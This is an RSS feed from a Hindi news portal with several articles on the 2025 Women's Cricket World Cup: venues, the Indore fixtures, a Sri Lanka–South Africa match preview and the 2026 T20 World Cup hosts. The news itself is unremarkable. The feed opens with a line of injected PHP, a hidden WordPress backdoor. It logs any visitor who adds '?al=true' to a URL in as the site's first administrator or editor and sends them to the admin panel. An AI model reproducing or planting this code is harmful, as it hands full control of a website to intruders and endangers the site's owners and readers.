// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Women’s World Cup – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Fri, 17 Oct 2025 04:45:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 महिला विश्व कप में रोमांचक मुकाबला: श्रीलंका और दक्षिण अफ्रीका के बीच आज होगी ‘करो या मरो’ जंग https://pratyushaashakinayikiran.com/?p=186077 Fri, 17 Oct 2025 04:45:00 +0000 https://pratyushaashakinayikiran.com/?p=186077 नई दिल्ली 
अगर मौसम मेहरबान रहा तो श्रीलंका और दक्षिण अफ्रीका की टीमें शुक्रवार को कोलंबों में महिला एकदिवसीय विश्व कप के महत्वपूर्ण मुकाबले में एक दूसरे के सामने कड़ी चुनौती पेश करने की कोशिश करेंगी। आर प्रेमदासा स्टेडियम में पिछले दो मैच बारिश के कारण रद्द करने पड़े और शुक्रवार को भी बारिश और आंधी आने का अनुमान है। अगर बारिश नहीं आती है और यह मैच खेला जाता है तो श्रीलंका टूर्नामेंट की अपनी पहली जीत हासिल करके सेमीफाइनल में जगह बनाने की अपनी उम्मीदों को जीवंत रखना चाहेगा। श्रीलंका ने दो मैच रद्द होने के कारण अभी तक दो अंक हासिल किए हैं और वह चार मैचों के बाद अंक तालिका में सबसे निचले स्थान पर हैं।

श्रीलंका ने न्यूजीलैंड के खिलाफ पिछले मैच में बल्लेबाजी में अच्छा प्रदर्शन किया था लेकिन बारिश ने जीत हासिल करने की उसकी उम्मीदों पर पानी फेर दिया था। उस मैच में श्रीलंका की कप्तान चमारी अटापट्टू और नीलक्षिका सिल्वा ने अर्धशतक जमाए थे। श्रीलंका को दक्षिण अफ्रीका के खिलाफ भी इसी तरह का प्रदर्शन जारी रखना होगा। दक्षिण अफ्रीका ने भारत और बांग्लादेश को करीबी मैचों में हराया था और उसकी टीम आत्मविश्वास से भरी होगी। टूर्नामेंट के अपने पहले मैच में इंग्लैंड से 10 विकेट से मिली करारी हार के बाद दक्षिण अफ्रीका ने न्यूजीलैंड, मेजबान भारत और बांग्लादेश के खिलाफ जीत हासिल करके नाटकीय अंदाज में स्थिति को बदल दिया है।

भारत और बांग्लादेश के खिलाफ मुश्किल हालात में दक्षिण अफ्रीका ने जीत हासिल करने के लिए सराहनीय संघर्ष और साहस दिखाया। इन दोनों ही मौकों पर नादिन डी क्लार्क सबसे ज़्यादा प्रभावशाली रहीं, जिन्होंने भारी दबाव में भी अद्भुत धैर्य का परिचय देते हुए टीम को जीत दिलाई। दक्षिण अफ्रीका के लिए शीर्ष क्रम के बल्लेबाजों का अच्छी शुरुआत को बड़े स्कोर में नहीं बदल पाना चिंता का विषय है। अगर उसे अपना विजय अभियान जारी रखना है तो उसके प्रमुख बल्लेबाजों को भी उपयोगी योगदान देना होगा।

टीम इस प्रकार हैं:
श्रीलंका:
चमारी अटापट्टू (कप्तान), हासिनी परेरा, विशमी गुणरत्ने, हर्षिता समरविक्रमा, कविशा दिलहारी, नीलाक्षी डी सिल्वा, अनुष्का संजीवनी, इमेशा दुलानी, देवमी विहंगा, पिउमी वाथसाला, इनोका राणावीरा, सुगंधिका कुमारी, उदेशिका प्रबोदानी, मल्की मदारा, अचिनी कुलसुरिया।

दक्षिण अफ्रीका: लौरा वोल्वार्ड्ट (कप्तान), ताज़मिन ब्रिट्स, एनेरी डर्कसन, मारिज़ैन कप्प, एनेके बॉश, सिनालो जाफ़्टा (विकेटकीपर), क्लो ट्रायॉन, नादिन डी क्लार्क, अयाबोंगा खाका, मसाबाता क्लास, नॉनकुलुलेको म्लाबा, सुने लुस, तुमी सेखुसोनगेस, नोंदुआबोमिसो म्लाबा।

मैच शुरू: दोपहर 3 बजे से।

 

]]>
विमेंस वर्ल्ड कप 2025 के पांच मुकाबले इंदौर के होलकर स्टेडियम में खेले जाएंगे https://pratyushaashakinayikiran.com/?p=164521 Tue, 17 Jun 2025 12:35:00 +0000 https://pratyushaashakinayikiran.com/?p=164521 इंदौर

इंटरनेशनल क्रिकेट काउंसिल ने विमेंस वनडे वर्ल्ड कप 2025 का शेड्यूल जारी कर दिया है. टूर्नामेंट का आगाज 30 सितंबर 2025 को होगा. जारी किए गए शेड्यूल के अनुसार मध्यप्रदेश के इंदौर के होलकर स्टेडियम में पांच मुकाबले खेले जाएंगे. इससे पहले साल 1997 में इंदौर को विमेंस वनडे वर्ल्ड कप का एक मैच मिला था, यानी यह दूसरा मौका है जब इंदौर में विमेंस वर्ल्ड कप के मैच खेले जाएंगे. खास बात ये है कि यह पहला मौका होगा जब होलकर स्टेडियम में वर्ल्ड कप के मैच खेले जाएंगे. 

पांच मैचों की मिली मेजबानी
इंदौर को महिला वर्ल्ड कप के पांच मुबाकलों की मेजबानी मिली है. पांचों मुकाबले होलकर स्टेडियम में दोपहर 3 बजे से खेले जाएंगे. भारत 12 साल बाद पहली बार विमेंस वर्ल्ड कप की मेजबानी करेगा. 2013 में भारत में विमेंस वर्ल्ड कप की मेजबानी मिली थी. इस टूर्नामेंट में 28 लीग मैच और तीन नॉकआउट मुकाबले में इंदौर, विशाखापट्टनम, बेंगलुरु, और कोलंबो में खेले जाएंगे. 

भारत करेगा 12 साल बाद वर्ल्ड कप की मेजबानी

भारत को 12 साल बाद फिर से विमेंस वर्ल्ड कप की मेजबानी मिली है। इससे पहले 2013 में भारत ने यह टूर्नामेंट होस्ट किया था। इस बार वर्ल्ड कप 30 सितंबर 2025 से शुरू होगा और 2 नवंबर को फाइनल मुकाबला खेला जाएगा।
इन शहरों में होंगे वर्ल्ड कप के मैच

इस बार कुल 28 लीग मुकाबले और 3 नॉकआउट मैच खेले जाएंगे। मैच इन पांच स्थानों पर होंगे-

    इंदौर
    बेंगलुरु
    गुवाहाटी
    विशाखापट्टनम
    कोलंबो

इंदौर में होने वाले 5 मुकाबले

    1 अक्टूबर – ऑस्ट्रेलिया बनाम न्यूजीलैंड
    6 अक्टूबर – न्यूजीलैंड बनाम दक्षिण अफ्रीका
    19 अक्टूबर – भारत बनाम इंग्लैंड
    22 अक्टूबर – ऑस्ट्रेलिया बनाम इंग्लैंड
    25 अक्टूबर – ऑस्ट्रेलिया बनाम श्रीलंका

इंदौर में डिफेंडिंग चैंपियन ऑस्ट्रेलिया खेलेगी पहला मुकाबला

मौजूदा चैंपियन ऑस्ट्रेलिया अपना पहला मैच 1 अक्टूबर को इंदौर में न्यूजीलैंड के खिलाफ खेलेगी। इसके बाद टीम 8 अक्टूबर को कोलंबो में पाकिस्तान से भिड़ेगी। इंदौर में ऑस्ट्रेलिया को तीन मुकाबले खेलने हैं।

IPL में नहीं मिला मुकाबला

बता दें कि इस साल हुए आईपीएल के सीजन में इंदौर को फिर एक भी मैच नहीं मिला था. इसके लिए प्रयास भी किए गए थे, लेकिन इसके बावजूद भी इंदौर में एक भी मुकाबला नहीं खेला गया. क्रिकेट फैंस लंबे समय से इंदौर में आईपीएल के मुकाबले का इंतजार कर रहे हैं. अगले सीजन में फैंस को उम्मीद है कि इंदौर को मेजबानी करने का मौका मिल जाए.  

सेमीफाइनल और फाइनल का शेड्यूल

    पहला सेमीफाइनल – 29 अक्टूबर को गुवाहाटी या कोलंबो में (पाकिस्तान के प्रदर्शन पर निर्भर)
    दूसरा सेमीफाइनल – 30 अक्टूबर को बेंगलुरु में
    फाइनल मुकाबला – 2 नवंबर को बेंगलुरु या कोलंबो में

1997 में भी इंदौर को मिला था वर्ल्ड कप मैच

इंदौर को दूसरी बार महिला वर्ल्ड कप की मेजबानी का मौका मिला है। इससे पहले 1997 में नेहरू स्टेडियम में भारत और न्यूजीलैंड के बीच वर्ल्ड कप मैच खेला गया था, जो टाई हुआ था।

 

]]>
इंदौर में विमेंस वर्ल्ड कप के होंगे मैच, ज्योतिरादित्य सिंधिया बोले- सभी मुकाबले होंगे रोमांचक https://pratyushaashakinayikiran.com/?p=161860 Fri, 06 Jun 2025 10:26:00 +0000 https://pratyushaashakinayikiran.com/?p=161860 इंदौर

 इंदौर को एक बड़ी जिम्मेदारी मिली है। यह जिम्मेदारी अंतरराष्ट्रीय महिला क्रिकेट से जुड़ी है। ऐसा इसलिए क्योंकि महिला क्रिकेट विश्व कप 2025 की शुरुआत होनी है। जिसके मैच इंदौर के होलकर स्टेडियम में भी होंगे। इसकी जानकारी केंद्रीय मंत्री ज्योतिरादित्य सिंधिया ने दी है। उनका कहना है कि होने वाले सभी मैच बेहद रोमांचक होंगे।

बता दें कि महिला वनडे विश्व कप 2025 के वेन्यू का ऐलान कर दिया गया है। 8 टीमों का यह टूर्नामेंट 30 सितंबर से 2 नवंबर तक भारत और श्रीलंका के पांच अलग-अलग शहरों – बेंगलुरु, गुवाहाटी, इंदौर, विशाखापत्तनम और कोलंबो में आयोजित किया जाएगा। भारतीय टीम बेंगलुरु में पहला मैच खेलेगी। वहीं पाकिस्तान अपने सभी मैच कोलंबो में खेलेगा। 2 नवंबर को होने वाला फाइनल बेंगलुरु या कोलंबो में होगा। यह इस बात पर निर्भर करेगा कि पाकिस्तान फाइनल मुकाबले के लिए क्वालीफाई होता है या नहीं।

आईसीसी ने महिला वनडे वर्ल्ड कप 2025 के शेड्यूल का ऐलान कर दिया है। दरअसल इस बार इस मेगा इवेंट की मेजबानी भारत करेगा और मुकाबले 30 सितंबर से 2 नवंबर तक चलेंगे। ये वर्ल्ड कप भारत के लिए खास इसलिए भी है क्योंकि देश में 12 साल बाद महिला वर्ल्ड कप का आयोजन हो रहा है। इससे पहले 2016 में महिला टी20 वर्ल्ड कप भारत में खेला गया था। इस बार मुकाबले बेंगलुरु, गुवाहाटी, इंदौर, विशाखापत्तनम और कोलंबो में होंगे।

दरअसल महिला वर्ल्ड कप 2025 में पाकिस्तान की टीम भारत नहीं आएगी। पाकिस्तान के मुकाबले कोलंबो के आर. प्रेमदासा स्टेडियम में कराए जाएंगे। वहीं भारत, ऑस्ट्रेलिया, इंग्लैंड, न्यूज़ीलैंड, दक्षिण अफ्रीका, श्रीलंका और बांग्लादेश भारत में अपने मुकाबले खेलेंगे। टूर्नामेंट राउंड-रॉबिन फॉर्मेट में होगा, जिसमें सभी टीमें एक-दूसरे से खेलेंगी। कुल 28 लीग मैच होंगे, जिसके बाद दो सेमीफाइनल और एक फाइनल मुकाबला खेला जाएगा। भारत अपना पहला मैच 30 सितंबर को बेंगलुरु में खेलेगा। अगर पाकिस्तान की टीम सेमीफाइनल या फाइनल में पहुंचती है, तो उसके मुकाबले भी कोलंबो में ही आयोजित किए जाएंगे। पहला सेमीफाइनल 29 अक्टूबर को गुवाहाटी या कोलंबो में खेला जाएगा और दूसरा सेमीफाइनल 30 अक्टूबर को बेंगलुरु में होगा। फाइनल मुकाबला 2 नवंबर को बेंगलुरु या कोलंबो में आयोजित किया जाएगा।

भारत पर रहेंगी निगाहें

दरअसल महिला वर्ल्ड कप 2025 में कुल 8 टीमें खेलेंगी, जिनमें भारत, पाकिस्तान, ऑस्ट्रेलिया, इंग्लैंड, न्यूजीलैंड, साउथ अफ्रीका, श्रीलंका और बांग्लादेश शामिल हैं। ऑस्ट्रेलिया मौजूदा चैंपियन है और इस टूर्नामेंट की सबसे सफल टीम भी रही है, जिसने अब तक 7 बार खिताब जीता है। 2022 में न्यूजीलैंड में हुए पिछले वर्ल्ड कप के फाइनल में ऑस्ट्रेलिया ने इंग्लैंड को हराया था। इस बार भारत घरेलू मैदान पर खेल रहा है, ऐसे में फैंस को महिला टीम से बेहतर प्रदर्शन की उम्मीद होगी। भारत की कप्तानी किस खिलाड़ी को मिलेगी, इसका ऐलान आने वाले हफ्तों में बीसीसीआई कर सकती है। टूर्नामेंट को लेकर भारत में क्रिकेट प्रेमियों में जबरदस्त उत्साह है और उम्मीद की जा रही है कि स्टेडियम खचाखच भरे नजर आएंगे।

महिला T20 वर्ल्ड कप 2026 की भी घोषणा

दरअसल आईसीसी ने महिला वनडे वर्ल्ड कप 2025 के साथ ही महिला टी20 वर्ल्ड कप 2026 के मेजबान की भी घोषणा कर दी है। इस बार यह टूर्नामेंट इंग्लैंड में खेला जाएगा, जिसकी शुरुआत 12 जून 2026 से होगी। पहला मुकाबला इंग्लैंड बर्मिंघम के एजबेस्टन स्टेडियम में खेलेगा। फाइनल 5 जुलाई को लंदन के प्रतिष्ठित लॉर्ड्स मैदान में खेला जाएगा। इस टूर्नामेंट में कुल 33 मुकाबले होंगे, जो 7 अलग-अलग शहरों में आयोजित किए जाएंगे। द ओवल दोनों सेमीफाइनल मैचों की मेजबानी करेगा, जो 30 जून और 2 जुलाई को खेले जाएंगे। बाकी मुकाबले मैनचेस्टर, लीड्स, साउथैम्प्टन और ब्रिस्टल में होंगे। इंग्लैंड को घरेलू परिस्थितियों का फायदा मिल सकता है, लेकिन भारत, ऑस्ट्रेलिया और न्यूजीलैंड जैसी टीमें भी खिताब की प्रबल दावेदार रहेंगी।

2024 में खेला गया था आखिरी टी-20

मध्यप्रदेश को 2018 के बाद लगातार 7वें साल आईपीएल का एक भी मैच नहीं मिला है। इससे यहां के फैंस मायूस नजर आ रहे हैं। 14 जनवरी 2024 को इंदौर में आखिरी इंटरनेशनल टी-20 मैच खेला गया था। यह मैच होलकर स्टेडियम में भारत और अफगानिस्तान के बीच था। इसके बाद यह माना जा रहा था कि 2025 के शेड्यूल में इंदौर को एक मैच जरूर मिल सकता है। इंदौर के होलकर स्टेडियम में अब तक 9 इंटरनेशनल मैच और इतने ही आईपीएल मैच हो चुके हैं।

 

]]>
Women’s World Cup के लिए वेन्यू और तारीख आई सामने, पाकिस्तानी टीम यहां खेलेगी मुकाबले https://pratyushaashakinayikiran.com/?p=161085 Tue, 03 Jun 2025 06:57:00 +0000 https://pratyushaashakinayikiran.com/?p=161085 मुंबई

ICC ने महिला वर्ल्ड कप 2025 के वेन्यू और तारीखों का ऐलान कर दिया है। इस टूर्नामेंट की मेजबानी भारत के पास है। महिला वर्ल्ड कप का ये 13वां संस्करण होगा, जो 30 सितंबर से 2 नवंबर तक बेंगलुरु, गुवाहाटी, इंदौर, विशाखापत्तनम और कोलंबो में खेला जाएगा। इस तरह 12 साल बाद भारत में महिला वर्ल्ड कप की वापसी होने जा रही है। 2016 में भारत में महिला T20 वर्ल्ड कप खेला गया था। टूर्नामेंट में कुल 8 टीमें हिस्सा लेंगी, जिनमें मेजबान भारत, ऑस्ट्रेलिया, इंग्लैंड, न्यूजीलैंड, साउथ अफ्रीका, श्रीलंका, पाकिस्तान और बांग्लादेश शामिल हैं। ऑस्ट्रेलिया इस टूर्नामेंट में मौजूदा चैंपियन के रूप में उतरेगी, जिसने 2022 में न्यूजीलैंड में हुए महिला वर्ल्ड कप 2022 के फाइनल में इंग्लैंड को हराया था। ऑस्ट्रेलिया टूर्नामेंट के इतिहास की सबसे सफल टीम भी हैं, जो सात बार चैंपियन बनी है।
पाकिस्तान यहां खेलेगी अपने मुकाबले

इस टूर्नामेंट के भारत में मुकाबले बेंगलुरु के एम. चिन्नास्वामी स्टेडियम, गुवाहाटी के एसीए स्टेडियम, इंदौर के होलकर स्टेडियम और विशाखापत्तनम के एसीए-वीडीसीए स्टेडियम में खेले जाएंगे। हालांकि, पाकिस्तान की टीम वर्ल्ड कप में शिरकत करने के लिए भारत नहीं आएगी। पाकिस्तान टीम अपने वर्ल्ड कप के मैच कोलंबो के आर प्रेमदासा स्टेडियम में खेलेगी। वहीं, भारत अपना पहला मैच 30 सितंबर को बेंगलुरु में खेलेगी। ये टूर्नामेंट राउंड-रॉबिन आधार पर खेला जाएगा, जिसमें कुल 28 लीग स्टेज मुकाबले होंगे। इसके बाद 2 सेमीफाइनल और फाइनल खेला जाएगा।
2 नवंबर को खेला जाएगा फाइनल

पाकिस्तान की टीम अगर सेमीफाइनल और फाइनल में पहुंचती है, तो फिर मुकाबले कोलंबो में खेले जाएंगे। यही वजह है कि पहला सेमीफाइनल 29 अक्टूबर को गुवाहाटी या कोलंबो में होगा, जबकि दूसरा सेमीफाइनल अगले दिन 30 अक्टूबर को बेंगलुरु में खेला जाएगा। इसके बाद दोनों फाइनलिस्टों के पास खिताब के निर्णायक मुकाबले की तैयारी के लिए कम से कम दो दिन का समय होगा, जिसमें 2025 महिला वर्ल्ड कप का फाइनल रविवार 2 नवंबर को बेंगलुरु या कोलंबो में होगा।

12 जून से T20 वर्ल्ड कप 2026 का आगाज

ICC महिला वर्ल्ड कप 2025 के साथ ही अगले साल खेले जाने वाले ICC महिला T20 वर्ल्ड कप 2026 के मेजबान के तौर पर इंग्लैंड की पुष्टि कर दी गई है। बर्मिंघम के एजबेस्टन में महिला T20 वर्ल्ड कप 2026 का 12 जून को आगाज होगा, जिसमें इंग्लैंड की टीम पहला मैच खेलेगी। वहीं, फाइनल 5 जुलाई को खेला जाएगा। इन 24 दिनों के दौरान कुल 33 मैच 7 वेन्यू पर खेले जाएंगे, जिनमें बर्मिंघम (एजबेस्टन), लंदन ( द ओवल और लॉर्ड्स) ओल्ड ट्रैफर्ड क्रिकेट ग्राउंड (मैनचेस्टर), हेडिंग्ले (लीड्स), द हैम्पशायर बाउल (साउथेम्प्टन) और ब्रिस्टल काउंटी ग्राउंड शामिल हैं। द ओवल दोनों सेमीफाइनल मुकाबलों की मेजबानी करेगा, जबकि फाइनल 5 जुलाई 2026 को प्रतिष्ठित लॉर्ड्स क्रिकेट ग्राउंड पर होगा। दोनों सेमीफाइनल 30 जून और 2 जुलाई 2026 को लंदन के द ओवल में खेले जाएंगे।

]]>